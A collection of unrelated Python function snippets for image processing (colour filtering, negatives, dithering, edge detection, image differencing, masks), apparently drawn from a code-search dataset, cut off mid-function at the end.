[ "def separate_colors(self):\n colors = self.get_sorted_pixels()\n colors_dict = dict((val[1], Image.new('RGB', self.size, (255,255,255))) \n for val in colors)\n pixel_dict = dict((img, []) for img in colors_dict.keys())\n\n pix = self.image.load()\n for i in range(self.width):\n for j in range(self.height):\n if pix[i,j] in colors_dict:\n colors_dict[pix[i,j]].putpixel((i,j),(0,0,0))\n pixel_dict[pix[i,j]].append((i, j))\n\n return [(color, colors_dict[color], pixels) for color, pixels in pixel_dict.items()]", "def falso_color(img):\n rows,cols = img.shape\n img_red = np.copy(img)\n img_green = np.copy(img)\n img_blue = np.copy(img)\n img_false = np.zeros((rows, cols, 3), dtype=np.uint8)\n\n for i in range(0,rows):\n for j in range(0,cols):\n\n if (0 <= img[i, j] <= 43):\n img_red[i, j] = 255\n img_green[i, j] = img[i, j] * (255 / 43)\n img_blue[i, j] = 0\n\n elif(43 < img[i, j] <= 86):\n img_red[i, j] = (255 - (img[i, j] - 43) * (255 / 43))\n img_green[i, j] = 255\n img_blue[i,j] = 0\n\n elif(86 < img[i, j] <= 128):\n img_red[i, j] = 0\n img_green[i, j] = 255\n img_blue[i, j] = ((img[i, j] - 86) * (255 / 42))\n\n elif(128<img[i, j]<=171):\n img_red[i, j] = 0\n img_green[i, j] = ((171 - img[i, j]) * (255 / 43))\n img_blue[i, j] = 255\n\n elif(171 < img[i, j] <= 214):\n img_red[i, j] = (img[i, j] - 171) * (255 / 43)\n img_green[i, j] = 0\n img_blue[i, j] = 255\n\n elif(214 < img[i, j]):\n img_red[i, j] = 255\n img_green[i, j] = 0\n img_blue[i, j] = ((255 - img[i, j]) * (255 / 41))\n\n img_false[:, :, 0] = img_red\n img_false[:, :, 1] = img_green\n img_false[:, :, 2] = img_blue\n\n return img_false", "def remove_colors(images):\n images = images[:, :, :, :, 0]\n return images", "def create_color_gradient():\n colors = []\n step = 10\n for red, green in zip(range(255,-step, -step), range(0, 255, step)):\n colors.append({'red': red, 'green': green, 'blue': 0})\n for green, blue in zip(range(255,-step, -step), range(0, 255, step)):\n colors.append({'red': 0, 'green': green, 'blue': blue})\n for blue, red in zip(range(255,-step, -step), range(0, 255, step)):\n colors.append({'red': red, 'green': 0, 'blue': blue})\n return colors", "def diff_image(images):\n prev_image = cv2.absdiff(images[0], images[1])\n cur_image = cv2.absdiff(images[1], images[2])\n return cv2.bitwise_and(prev_image, cur_image)", "def testImageProcessing():\n Im_pix = getRGB( 'in.png' ) # read in the in.png image\n print \"The first two pixels of the first row are\",\n print Im_pix[0][0:2]\n # remember that Im_pix is a list (the image)\n # of lists (each row) of lists (each pixel is [R,G,B])\n New_pix = [ [ [255 - num for num in p] for p in row ] for row in Im_pix ]\n # now, save to the file 'out.png'\n saveRGB( New_pix, 'out.png' )", "def negative(img): \n for pixel in img:\n x, y, col = pixel \n r, g, b = col\n \n new_color = create_color(255 - r, 255 - g, 255 - b)\n set_color(img, x, y, new_color)", "def groupByColor_unlifted(pixmap):\n # Count the number of colors\n nb_colors = int(pixmap.max()) + 1\n # Create a pixmap for each color\n splited = [(pixmap == i) * i for i in range(1, nb_colors)]\n # Filter out empty images\n return [x for x in splited if np.any(x)]", "def diff(self,images):\n diffArray = [0,1,2,3]\n\n # compute the difference bewteen two adjacent images in the same ovtave\n for i in range(1,5):\n diffArray[i-1] = images[i]-images[i-1]\n\n return numpy.array(diffArray)", "def one_color(image,color=[0,0,255]):\r\n output = image.copy()\r\n for line in range(len(image)):\r\n for column in 
range(len(image[0])):\r\n distance = calc_distance(color,image[line][column])\r\n if distance <=150:\r\n output[line][column]=[255,255,255]\r\n else:\r\n output[line][column]=[0,0,0]\r\n return output", "def diff_image_color(image_path0, image_path1):\n image0 = Image.open(image_path0)\n #color_image0 = get_histogram(image0)\n color_image0 = image0.histogram()\n cut_color_image0 = cut_histogram_min(color_image0)\n image1 = Image.open(image_path1)\n color_image1 = image1.histogram()\n #color_image1 = get_histogram(image1)\n cut_color_image1 = cut_histogram_min(color_image1)\n color_difference = bhattacharyya(color_image0, color_image1)\n return color_difference", "def find_image(grouped):\n for _i in grouped:\n _i[0] = _i[0] * 10 #increases value of red components\n if _i[0] > 225:\n _i[0] = 225\n _i[1] = _i[0] #sets green components equal to red\n _i[2] = _i[0] #sets blue components equal to red\n return grouped", "def _dilate(mat, structure):\n offset_w = int(structure.shape[0]/2)\n offset_h = int(structure.shape[1]/2)\n\n dilated = np.zeros_like(mat)\n for i in range(offset_w, mat.shape[0]-offset_w-1):\n for j in range(offset_h, mat.shape[1]-offset_h-1):\n if mat[i,j] == 255:\n dilated[i-offset_w:i+offset_w+1,j-offset_h:j+offset_h+1] = np.maximum(\n mat[i-offset_w:i+offset_w+1,j-offset_h:j+offset_h+1],\n structure\n )\n return dilated", "def edges(self, step: Vector = 1) -> np.ndarray:\n if isinstance(step, (int, float)):\n step = (step, step)\n nu = self.imgsz[0] / step[0] + 1\n nv = self.imgsz[1] / step[1] + 1\n u = np.linspace(0, self.imgsz[0], int(nu))\n v = np.linspace(0, self.imgsz[1], int(nv))\n return np.vstack(\n (\n np.column_stack((u, np.repeat(0, len(u)))),\n np.column_stack((np.repeat(u[-1], len(v) - 2), v[1:-1])),\n np.column_stack((u[::-1], np.repeat(v[-1], len(u)))),\n np.column_stack((np.repeat(0, len(v) - 2), v[::-1][1:-1])),\n )\n )", "def red_filter(img):\r\n #with Image.open(filename) as img:\r\n w = img.width\r\n h = img.height\r\n\r\n newimg = Image.new('RGB', (w,h))\r\n for y in range(h):\r\n for x in range(w):\r\n r, g, b = img.getpixel((x,y))\r\n \r\n newimg.putpixel((x, y), (r, 0, 0))\r\n \r\n return newimg", "def tile_image(im):\n r1 = np.concatenate((im[::-1,::-1], im[::-1], im[::-1, ::-1]), 1)\n r2 = np.concatenate((im[:,::-1], im, im[:, ::-1]), 1)\n r3 = np.concatenate((im[::-1,::-1], im[::-1], im[::-1, ::-1]), 1)\n return(np.concatenate((r1, r2,r3), 0))", "def _generate_images(self, trace):\n images = []\n colors = []\n colors_by_shape = {}\n for board in trace:\n width = int(round((float(board.shape[1]) / board.shape[0]) * self._height))\n cellsize = width / board.shape[1] # cell size\n img = np.zeros((self._height, width, 3), dtype=np.uint8)\n\n tiles = {} # map from integer rep. 
of the tile to a shape\n for y in range(board.shape[0]):\n for x in range(board.shape[1]):\n cell = board[y,x]\n if cell not in tiles:\n tiles[cell] = (x, y, 1, 1) # x, y, w, h\n else:\n cur_x, cur_y, cur_w, cur_h = tiles[cell]\n if x >= cur_x + cur_w:\n cur_w = (x-cur_x) + 1\n if y >= cur_y + cur_h:\n cur_h = (y-cur_y) + 1\n tiles[cell] = (cur_x, cur_y, cur_w, cur_h)\n\n # Colors\n if len(colors_by_shape) == 0:\n for tid in tiles:\n shape = (tiles[tid][2], tiles[tid][3])\n if shape not in colors_by_shape:\n colors_by_shape[shape] = hex_to_rgb(random_unique_color(colors))\n colors.append(colors_by_shape[shape])\n\n for tid in tiles:\n x, y, w, h = tiles[tid]\n shape = (w,h)\n empty = board[y,x] == 0\n x, y, w, h = x*cellsize, y*cellsize, w*cellsize, h*cellsize\n # Draw a filled rectangle without color\n if not empty:\n cv2.rectangle(img, (x, y), (x+w, y+h), colors_by_shape[shape],-1)\n else:\n cv2.rectangle(img, (x, y), (x+w, y+h), [0,0,0], -1) #, 8)-\n # Draw a boundary\n cv2.rectangle(img, (x, y), (x+w, y+h), (0, 0, 0), 2, 8)\n \n images.append(img)\n return images", "def fold_diag(pixels):\n copy = blank_image(len(pixels), len(pixels[0])) \n for r in range(len(pixels)):\n for c in range(len(pixels[0])):\n copy[r][c] = pixels[r][c]\n for r in range(len(pixels)):\n for c in range(r):\n copy[r][c] = [255, 255, 255]\n return copy", "def split_image(img):\n xs = [] # positions\n ys = [] # colors\n for row_i in range(img.shape[0]):\n for col_i in range(img.shape[1]):\n xs.append([row_i, col_i])\n ys.append(img[row_i, col_i])\n \n xs = np.array(xs)\n ys = np.array(ys)\n return xs, ys", "def split_image(img):\n xs = [] # positions\n ys = [] # colors\n for row_i in range(img.shape[0]):\n for col_i in range(img.shape[1]):\n xs.append([row_i, col_i])\n ys.append(img[row_i, col_i])\n \n xs = np.array(xs)\n ys = np.array(ys)\n return xs, ys", "def component_filter_by_color(components, img):\n new_component = []\n for component in components:\n component_left_neighbor = img[component[0].start:component[0].stop,\n max(component[1].start - 10, 0):component[1].start]\n component_right_neighbor = img[component[0].start:component[0].stop,\n component[1].stop:min(component[1].stop + 10, img.shape[1])]\n component_up_neighbor = img[max(component[0].start - 10, 0):component[0].start,\n component[1].start:component[1].stop]\n component_low_neighbor = img[component[0].stop:min(component[0].stop + 10, img.shape[0]),\n component[1].start:component[1].stop]\n left_white_ratio = np.sum(component_right_neighbor > 240) / (\n component_right_neighbor.shape[0] * component_right_neighbor.shape[1])\n right_white_ratio = np.sum(component_left_neighbor > 240) / (\n component_left_neighbor.shape[0] * component_left_neighbor.shape[1])\n up_white_ratio = np.sum(component_up_neighbor > 240) / (\n component_up_neighbor.shape[0] * component_up_neighbor.shape[1])\n low_white_ratio = np.sum(component_low_neighbor > 240) / (\n component_low_neighbor.shape[0] * component_low_neighbor.shape[1])\n if np.sum([left_white_ratio > 0.9, right_white_ratio > 0.9, up_white_ratio > 0.9, low_white_ratio > 0.9]) > 2:\n new_component.append(component)\n return new_component", "def gd(a, step_size=0.1, steps=42):\n out = []\n ### YOUR CODE HERE\n out.append(np.array([256,1]))\n for i in range(steps):\n point = out[i]\n gradient = np.array([0.5*2*a[i],0.5*2*a[i+1]])\n npoint = point - step_size*gradient\n out.append(npoint)\n ### END CODE\n return out", "def __diff_image(self):\n img = cv2.imread(self.imagefile()).copy()\n 
Reference.__draw_bugs(img, self.__true_positives, False, 1)\n Reference.__draw_bugs(img, self.__false_negatives, (0, 255, 0))\n Reference.__draw_bugs(img, self.__false_positives, (0, 0, 255))\n return img", "def CleanBadPixels(spectraUp,spectraDown):\n \n Clean_Up= []\n Clean_Do = []\n Clean_Av = []\n eps=25. # this is the minumum background Please check\n NBSPEC=len(spectraUp)\n for index in np.arange(0,NBSPEC):\n s_up=spectraUp[index]\n s_do=spectraDown[index]\n \n index_up=np.where(s_up<eps)\n index_do=np.where(s_do<eps)\n \n s_up[index_up]=s_do[index_up]\n s_do[index_do]=s_up[index_do]\n s_av=(s_up+s_do)/2.\n \n Clean_Up.append(s_up)\n Clean_Do.append(s_do)\n Clean_Av.append(s_av)\n \n return Clean_Up, Clean_Do,Clean_Av", "def montage(images, w_sub, h_sub, step):\n target = Image.new('RGB', (w_sub*step, h_sub*step))\n left = 0\n right = w_sub\n for i in range(len(images)):\n top=(i//step)*h_sub\n target.paste(images[i], (left, top, right, top+h_sub))\n if(i//step < (i+1)//step):#Check if this row is done\n left = 0#Reset the position in a row\n right = w_sub\n else: #Next picture\n left += w_sub\n right += w_sub\n quality_value = 100\n return target", "def visualize_seam_end_on_image(pixels, end_x):\n\n h = len(pixels)\n w = len(pixels[0])\n\n new_pixels = [[p for p in row] for row in pixels]\n\n min_x = max(end_x - 5, 0)\n max_x = min(end_x + 5, w - 1)\n\n min_y = max(h - 11, 0)\n max_y = h - 1\n\n for y in range(min_y, max_y + 1):\n for x in range(min_x, max_x + 1):\n new_pixels[y][x] = Color(255, 0, 0)\n\n return new_pixels", "def getDiffPercent(path, path2 ):\n global ans\n ans = []\n img = Image.open( path ) \n img2 = Image.open( path2 )\n\n width, height = img.size\n width2, height2 = img2.size\n \n diff = 0\n k = 0\n\n for i in range(width): \n for j in range(height):\n rgb = img.load()[i,j]\n rgb2 = img2.load()[i,j]\n \n if( rgb[0] == rgb2[0] and rgb[1] == rgb2[1] and rgb[2] == rgb2[2] and rgb[0] == 0 and rgb[1] == 0 and rgb[2] == 0 ):\n k = k+1\n if( rgb[0] == rgb2[0] and rgb[1] == rgb2[1] and rgb[2] == rgb2[2] and rgb[0] == 255 and rgb[1] == 255 and rgb[2] == 255 ):\n k = k+1 \n \n diff = diff + pixelDiff(rgb, rgb2)\n\n img.close()\n img2.close()\n \n mx = 3 * 255 * ( width * height - k)\n return 100*diff/mx", "def get_dark_images(new_path, dataframe):\n\n image_list = [i for i in dataframe['image']]\n return [1 if np.mean(np.array(Image.open(new_path + image))) == 0 else 0 for image in image_list]", "def create_masks(rows, columns):\n mask_red = numpy.zeros((rows, columns), 'uint8')\n mask_green = numpy.zeros((rows, columns), 'uint8')\n mask_blue = numpy.zeros((rows, columns), 'uint8')\n final_red = numpy.zeros((rows, columns), 'uint8')\n final_green = numpy.zeros((rows, columns), 'uint8')\n final_blue = numpy.zeros((rows, columns), 'uint8')\n green = numpy.array([[0, 1], [1, 0]])\n blue = numpy.array([[0, 0], [0, 1]])\n red = numpy.array([[1, 0], [0, 0]])\n p = 0\n u = 0\n for i in range(0, rows - 1, 2):\n for j in range(0, columns - 1, 2):\n mask_green[i, j + 1] = green[p, u + 1]\n mask_green[i + 1, j] = green[p + 1, u]\n mask_red[i, j] = red[p, u]\n mask_blue[i + 1, j + 1] = blue[p + 1, u + 1]\n return mask_blue, mask_green, mask_red", "def split_colors(self, color_count, color_from, color_to):\n colors = []\n for c in range(3):#RGB\n step = np.abs(color_from[c] - color_to[c])/color_count\n if step:\n if color_from[c]>color_to[c]:\n color = np.arange(color_from[c],color_to[c],-step)\n else:\n color = np.arange(color_from[c],color_to[c],step)\n else:\n color = 
[color_from[c] for i in np.arange(color_count)]\n\n\n colors.append(color)\n colors = [(a,b,c) for a,b,c in zip(colors[0],colors[1],colors[2])]\n return colors", "def imageprepare():\r\n file_name = 'temp_image.png'\r\n im = Image.open(file_name).convert('L')\r\n im = im.resize((20, 20))\r\n p = Image.new('L', (28,28), (255))\r\n p.paste(im,(4,4,24,24))\r\n p.save(\"last_image.png\")\r\n\r\n tv = list(p.getdata()) # get pixel values\r\n # normalize pixels to 0 and 1. 0 is pure white, 1 is pure black.\r\n tva = [(255 - x) * 1.0 / 255.0 for x in tv]\r\n tva = np.reshape(tva, (28, 28))\r\n\r\n return tva", "def unique_colors(img):\n colors = {i[1] for i in img.getcolors(maxcolors=img.size[0]*img.size[1])}\n return colors", "def image_enhancement(img):\r\n new_img = []\r\n height = len(img)\r\n width = len(img[0])\r\n for j in range(height-1):\r\n new_img += [[]]\r\n for i in range(width-1):\r\n new_img[2*j] += [img[j][i]]\r\n new_img[2*j] += [np.uint8((int(img[j][i]) + int(img[j][i+1])) / 2)]\r\n new_img[2*j] += [img[j][width-1], img[j][width-1]]\r\n\r\n new_img += [[]]\r\n for i in range(width-1):\r\n new_img[2*j+1] += [np.uint8((int(img[j][i]) + int(img[j+1][i])) / 2)]\r\n new_img[2*j+1] += [np.uint8((int(img[j][i]) + int(img[j][i+1]) + int(img[j+1][i]) + int(img[j+1][i+1])) / 4)]\r\n new_img[2*j+1] += [np.uint8((int(img[j][width-1]) + int(img[j+1][width-1])) / 2),\r\n np.uint8((int(img[j][width-1]) + int(img[j+1][width-1])) / 2)]\r\n\r\n return np.array(new_img)", "def ordered_dithering(pixel, size, matrix):\n\tX, Y = size\n\tN = len(matrix)\n\n\tT = [[255 * (matrix[x][y] + 0.01) / N / N for x in xrange(N)] for y in xrange(N)]\n\n\t# print(T)\n\n\tfor y in xrange(0, Y):\n\t\tfor x in xrange(0, X):\n\t\t\tpixel[x, y] = 255 if pixel[x, y] > T[x % N][y % N] else 0", "def add_unique_colors(image, result, colors=None):\n if colors is None:\n colors = np.unique(image)\n\n unique_side = [False for i in range(10)]\n unique_corner = [False for i in range(10)]\n\n half_size = (((image.shape[0] + 1) // 2), ((image.shape[1] + 1) // 2))\n for (image_part, side, unique_list) in [\n (image[: half_size[0]], \"bottom\", unique_side),\n (image[-half_size[0] :], \"top\", unique_side),\n (image[:, : half_size[1]], \"right\", unique_side),\n (image[:, -half_size[1] :], \"left\", unique_side),\n (image[-half_size[0] :, -half_size[1] :], \"tl\", unique_corner),\n (image[-half_size[0] :, : half_size[1]], \"tr\", unique_corner),\n (image[: half_size[0], : half_size[1]], \"br\", unique_corner),\n (image[: half_size[0], -half_size[1] :], \"left\", unique_corner),\n ]:\n unique = np.uint8(np.unique(image_part))\n if len(unique) == len(colors) - 1:\n color = [x for x in colors if x not in unique][0]\n unique_list[color] = True\n result[\"colors\"][color].append({\"type\": \"unique\", \"side\": side})\n\n for i in range(10):\n if unique_corner[i]:\n result[\"colors\"][i].append({\"type\": \"unique\", \"side\": \"corner\"})\n if unique_side[i]:\n result[\"colors\"][i].append({\"type\": \"unique\", \"side\": \"side\"})\n if unique_side[i] or unique_corner[i]:\n result[\"colors\"][i].append({\"type\": \"unique\", \"side\": \"any\"})\n\n return", "def png2chomp( fname ):\n # open PNG with python image library\n im = Image.open( fname )\n arr = numpy.asarray( im )\n # Find where pixels are black. 255 == white. 
\n w = numpy.where( arr != 255 ) \n del arr\n # filter the rgb format\n w2 = numpy.where( w[2] == 0 )[0]\n newarr = numpy.vstack( ( w[0][w2], w[1][w2] ) ).T\n chfile = fname.strip('png') + 'cub'\n array2chomp( newarr, chfile )", "def flow_to_image(flow):\n out = []\n maxu = -999.\n maxv = -999.\n minu = 999.\n minv = 999.\n maxrad = -1\n for i in range(flow.shape[0]):\n u = flow[i, :, :, 0]\n v = flow[i, :, :, 1]\n idxunknow = (abs(u) > 1e7) | (abs(v) > 1e7)\n u[idxunknow] = 0\n v[idxunknow] = 0\n maxu = max(maxu, np.max(u))\n minu = min(minu, np.min(u))\n maxv = max(maxv, np.max(v))\n minv = min(minv, np.min(v))\n rad = np.sqrt(u ** 2 + v ** 2)\n maxrad = max(maxrad, np.max(rad))\n u = u / (maxrad + np.finfo(float).eps)\n v = v / (maxrad + np.finfo(float).eps)\n img = compute_color(u, v)\n out.append(img)\n return np.float32(np.uint8(out))", "def compare_images(image1, image2, method='diff', *, n_tiles=(8, 8)):\n if image1.shape != image2.shape:\n raise ValueError('Images must have the same shape.')\n\n img1 = img_as_float(image1)\n img2 = img_as_float(image2)\n\n if method == 'diff':\n comparison = np.abs(img2 - img1)\n elif method == 'blend':\n comparison = 0.5 * (img2 + img1)\n elif method == 'checkerboard':\n shapex, shapey = img1.shape\n mask = np.full((shapex, shapey), False)\n stepx = int(shapex / n_tiles[0])\n stepy = int(shapey / n_tiles[1])\n for i, j in product(range(n_tiles[0]), range(n_tiles[1])):\n if (i + j) % 2 == 0:\n mask[i * stepx:(i + 1)*stepx, j * stepy:(j + 1) * stepy] = True\n comparison = np.zeros_like(img1)\n comparison[mask] = img1[mask]\n comparison[~mask] = img2[~mask]\n else:\n raise ValueError('Wrong value for `method`. '\n 'Must be either \"diff\", \"blend\" or \"checkerboard\".')\n return comparison", "def add_color(self, markers):\n self.img[markers == -1] = [255, 255, 255]\n self.img[markers == 1] = [255, 0, 0]\n self.img[markers == 2] = [0, 50, 0]\n self.img[markers == 3] = [0, 0, 255]\n self.img[markers == 4] = [255, 255, 0]\n self.img[markers == 5] = [0, 255, 255]\n self.img[markers == 6] = [255, 0, 255]\n\n self.img[markers == 7] = [125, 0, 0]\n self.img[markers == 8] = [0, 125, 0]\n self.img[markers == 9] = [0, 0, 125]\n self.img[markers == 10] = [125, 125, 0]\n self.img[markers == 11] = [0, 125, 125]\n self.img[markers == 12] = [125, 0, 125]\n\n self.img[markers == 13] = [255, 255, 255]\n self.img[markers == 14] = [255, 0, 0]\n self.img[markers == 15] = [0, 255, 0]\n self.img[markers == 16] = [0, 0, 255]\n self.img[markers == 17] = [255, 255, 0]\n self.img[markers == 18] = [0, 255, 255]\n self.img[markers == 19] = [255, 0, 255]", "def sharp_diff_error(gen_frames, gt_frames):\n shape = tf.shape(gen_frames)\n num_pixels = tf.to_float(shape[1] * shape[2] * shape[3])\n\n # gradient difference\n # create filters [-1, 1] and [[1],[-1]] for diffing to the left and down respectively.\n # TODO: Could this be simplified with one filter [[-1, 2], [0, -1]]?\n pos = tf.constant(np.identity(3), dtype=tf.float32)\n neg = -1 * pos\n filter_x = tf.expand_dims(tf.stack([neg, pos]), 0) # [-1, 1]\n filter_y = tf.stack([tf.expand_dims(pos, 0), tf.expand_dims(neg, 0)]) # [[1],[-1]]\n strides = [1, 1, 1, 1] # stride of (1, 1)\n padding = 'SAME'\n\n gen_dx = tf.abs(tf.nn.conv2d(gen_frames, filter_x, strides, padding=padding))\n gen_dy = tf.abs(tf.nn.conv2d(gen_frames, filter_y, strides, padding=padding))\n gt_dx = tf.abs(tf.nn.conv2d(gt_frames, filter_x, strides, padding=padding))\n gt_dy = tf.abs(tf.nn.conv2d(gt_frames, filter_y, strides, padding=padding))\n\n 
gen_grad_sum = gen_dx + gen_dy\n gt_grad_sum = gt_dx + gt_dy\n\n grad_diff = tf.abs(gt_grad_sum - gen_grad_sum)\n\n batch_errors = 10 * log10(1 / ((1 / num_pixels) * tf.reduce_sum(grad_diff, [1, 2, 3])))\n return tf.reduce_mean(batch_errors)", "def denoise(grouped, width, height, reach, beta):\n new_pixels = []\n new_pixels = copy.deepcopy(grouped)\n for row in range(height):\n for column in range(width):\n neighbors = locate_neighbors(grouped, row, column, width, height, reach)\n insertion_sort(neighbors)\n med = neighbors[len(neighbors)//2]\n row_num = (row * width) + column\n original = new_pixels[row_num][0]\n if abs(original - med) / (original + 0.1) > beta:\n new_pixels[row_num][0] = int(med)\n new_pixels[row_num][1] = int(med)\n new_pixels[row_num][2] = int (med)\n return new_pixels", "def processframe(pilimage):\n # TODO: Idea on of overfilling\n # [[0,0,0],\n # [1,1,1],\n # [0,0,0]]\n # Keep this as template. aka pattern. use scipy measure and that s pattern to match all connecting\n # this gets all the fills. the rest is thrown into the pile of sets.\n # we assume index 0 as discarded (Can't really do much with black images.)\n numpyarrayfrompil = numpy.array(pilimage)\n # First we pass to regionprops\n props = createfillers(numpyarrayfrompil)\n # pass all the data we need now to the mapprops2color\n # returns a string which can be cerealised.\n return mapprops2color(props, numpyarrayfrompil, pilimage)", "def find_reddest_pixel(img):\n # HINTS/ADVICE-------------\n # Use a nested for loop here.\n #\n # BE CAREFUL DOING ARITHMETIC WITH UNSIGNED INTEGERS: \n # >>> a = np.array([2], dtype='uint8')\n # >>> b = np.array([3], dtype='uint8')\n # >>> a - b\n # array([255], dtype=uint8)\n #\n # Reminder:\n # numpy arrays have a \"shape\" attribute that stores the layout:\n # img.shape[0] - rows\n # img.shape[1] - columns\n # img.shape[2] - color channels\n\n max_redness = 0\n max_x = 0\n max_y = 0\n \n img = np.array(img, dtype = 'int32')\n for r in range(img.shape[0]):\n for c in range(img.shape[1]):\n red = img[r, c, 2]\n green = img[r, c, 1]\n blue = img[r, c, 0] \n redness = (red - green) + (red - blue)\n\n if redness > max_redness:\n max_redness = redness\n max_x = c\n max_y = r\n \n return (max_x, max_y)", "def show_methods_differences(gt_path, img_m1_path, img_m2_path, thr, step, save_folder, methods):\n name = gt_path.split('/')[-1]\n name = name.split('.')[0]\n if not os.path.exists(os.path.join(save_folder, methods)):\n os.makedirs(os.path.join(save_folder, methods))\n\n gt = cv2.imread(gt_path)\n gt = gaussian_filter(gt, sigma=1)\n img_m1 = cv2.imread(img_m1_path)\n img_m1 = gaussian_filter(img_m1, sigma=1)\n img_m2 = cv2.imread(img_m2_path)\n img_m2 = gaussian_filter(img_m2, sigma=1)\n r, c, z = gt.shape\n mask = np.zeros((r, c, 3))\n dif_gt_m1 = np.abs(gt - img_m1)\n cv2.imwrite(os.path.join(save_folder, methods, name + 'gt_m1.png'), dif_gt_m1)\n dif_gt_m2 = np.abs(gt - img_m2)\n cv2.imwrite(os.path.join(save_folder, methods, name + 'gt_m2.png'), dif_gt_m2)\n\n # GREEN WILL BE ASSIGNED TO THOSE PIXELS THAT HAS LOWER DIFF USING FIRST METHOD AND RED TO THE SECOND\n for i in range(step,r-step-1,step):\n for j in range(0,c-1,step):\n print(np.mean(dif_gt_m1[i, j, :]))\n print(np.mean(dif_gt_m2[i, j, :]))\n print('-------------------------')\n if int(np.mean(dif_gt_m1[i, j, :])) > thr and int(np.mean(dif_gt_m2[i, j, :])) > thr:\n if np.mean(dif_gt_m1[i, j, :]) > np.mean(dif_gt_m2[i, j, :]):\n mask[i-step:i+step, j-step:j+step, :] = [0, 0, 1]\n else:\n mask[i-step:i+step, 
j-step:j+step, :] = [0, 1, 0]\n mask = mask*255\n cv2.imwrite(os.path.join(save_folder, methods, name + '.png'), mask)", "def generate_lut(self):\n r,g,b=(Numeric.zeros(256),Numeric.zeros(256),Numeric.zeros(256))\n for i in Numeric.arange(256):\n r_,g_,b_=self.colfct(i/255.0) # these are from [0,1]\n r[i],g[i],b[i]=int(255*r_),int(255*g_),int(255*b_)\n return r,g,b", "def extract_red(img):\n red_img = np.zeros(img.shape)\n logic = np.zeros((img.shape[0], img.shape[1]))\n np.logical_and(img[:, :, 2] > 50, img[:, :, 1] < 100, logic)\n np.logical_and(img[:, :, 0] < 100, logic, logic)\n\n red_img[logic.astype(bool)] = [0, 0, 255]\n return red_img", "def setColors(self):\n #productive\n profprint()\n self.color= [[0,0,0] for i in range(205)]\n self.color255= self.setColors255()\n for i in range(205):\n for j in range(3):\n self.color[i][j] = self.color255[i][j]/float(255)\n\n return self.color", "def detectEdges(image, amount):\n\n def average(triple):\n (r, g, b) = triple\n return (r + g + b) / 3\n\n blackPixel = (0, 0, 0)\n whitePixel = (255, 255, 255)\n new = image.clone()\n for y in range(image.getHeight() - 1):\n for x in range(1, image.getWidth()):\n oldPixel = image.getPixel(x, y)\n leftPixel = image.getPixel(x - 1, y)\n bottomPixel = image.getPixel(x, y + 1)\n oldLum = average(oldPixel)\n leftLum = average(leftPixel)\n bottomLum = average(bottomPixel)\n if abs(oldLum - leftLum) > amount or \\\n abs(oldLum - bottomLum) > amount:\n new.setPixel(x, y, blackPixel)\n else:\n new.setPixel(x, y, whitePixel)\n return new", "def color(step: int=10) -> Tuple[int, int, int]:\n # Randomly seed the r g b values\n r, g, b = (random_uniform(0, 255), random_uniform(0, 255),\n random_uniform(0, 255))\n\n # Randomly determine if each r g and b value is increasing or not\n r_inc = True\n g_inc = True\n b_inc = True\n r_step = random_uniform(step)\n g_step = random_uniform(step)\n b_step = random_uniform(step)\n\n # Yield the initial r, g, b values\n yield r, g, b\n\n # Loop and yeild forever\n while True:\n # If r is increasing\n if r_inc:\n # Increment r by the step\n r += r_step\n # Ensure that the next step will be within the limits\n # if not then set the flag to decreasing\n r_inc = r < 255 - r_step\n # If r is decreasing\n else:\n # Decrement r by the step\n r -= r_step\n # Ensure that the next step will be within the limits\n # if not then set the flag to increasing\n r_inc = r < r_step\n\n # See above\n if g_inc:\n g += g_step\n g_inc = g < 255 - g_step\n else:\n g -= g_step\n g_inc = g < g_step\n\n # See above\n if b_inc:\n b += b_step\n b_inc = b < 255 - b_step\n else:\n b -= b_step\n b_inc = b < b_step\n\n # Yield the red, green, and blue values\n yield r, g, b", "def detectEdges(image, amount):\n\n def average(triple):\n (r, g, b) = triple\n return (r + g + b) // 3\n\n blackPixel = (0, 0, 0)\n whitePixel = (255, 255, 255)\n new = image.clone()\n y = 0\n for y in range(image.getHeight() - 1):\n for x in range(1, image.getWidth()):\n oldPixel = image.getPixel(x, y)\n leftPixel = image.getPixel(x - 1, y)\n bottomPixel = image.getPixel(x, y + 1)\n oldLum = average(oldPixel)\n leftLum = average(leftPixel)\n bottomLum = average(bottomPixel)\n if abs(oldLum - leftLum) > amount or \\\n abs(oldLum - bottomLum) > amount:\n new.setPixel(x, y, blackPixel)\n else:\n new.setPixel(x, y, whitePixel)\n return new", "def del2(im_input):\n\n # initialize output\n im_lap = np.zeros(im_input.shape)\n\n # process rows first\n D = np.diff(im_input, axis=0)\n S = np.zeros(im_input.shape)\n S[1:-1, :] = (D[1:, :] - 
D[0:-1, :]) / 2\n if im_input.shape[0] > 3:\n S[0, :] = 2 * S[1, :] - S[2, :]\n S[-1, :] = 2 * S[-2, :] - S[-3, :]\n elif im_input.shape[0] == 3:\n S[0, :] = S[1, :]\n S[-1, :] = S[1, :]\n else:\n S[0, :] = 0\n S[-1, :] = 0\n im_lap += S\n\n # process columns\n D = np.diff(im_input, axis=1)\n S = np.zeros(im_input.shape)\n S[:, 1:-1] = (D[:, 1:] - D[:, 0:-1]) / 2\n if im_input.shape[1] > 3:\n S[:, 0] = 2 * S[:, 1] - S[:, 2]\n S[:, -1] = 2 * S[:, -2] - S[:, -3]\n elif im_input.shape[1] == 3:\n S[0, :] = S[:, 1]\n S[:, -1] = S[:, 1]\n else:\n S[:, 0] = 0\n S[:, -1] = 0\n im_lap += S\n\n return im_lap / 2", "def sane(im,rangeTuple,y,start,end):\r\n #im = Image.open(pageImage)\r\n print(im.n_frames)\r\n lst = []\r\n for pg in range(rangeTuple[0],rangeTuple[1]+1):\r\n acc = True \r\n im.seek(pg)\r\n pix = im.load()\r\n for i in range(start,end):\r\n if(pix[i,y][0]!=0 or pix[i,y][1]!=255):\r\n acc = False \r\n break\r\n if(acc):\r\n lst.append(pg)\r\n return lst", "def extract(self, files):\n for i in range(len(files)):\n print(files[i])\n img = cv2.imread('{}/{}'.format('{}/{}/{}'.format(DIR_2DST_Mask, self.patient, self.plan), files[i]), 0)\n\n \"\"\"\n Find the indices of array elements that are non-zero, i.e,\n find the pixels' positions that represents the respiratory\n functions (pixels in the respiratory function are brighter).\n \"\"\"\n color_pts = np.argwhere(img > 70)\n\n \"\"\"\n Sorts the pixels according to their x coordenate.\n Obs: np.argwhere inverts x and y, it's like (y, x), because of it,\n the parameter of itemgetter is 1 (to get x coordinate)\n \"\"\"\n lcolor_pts = sorted(color_pts.tolist(), key=itemgetter(1))\n\n \"\"\"\n If there is no pixel representing the respiratory function\n (i.e., lighter pixel) it creates an empty image (without any\n respiratory function)\n \"\"\"\n if 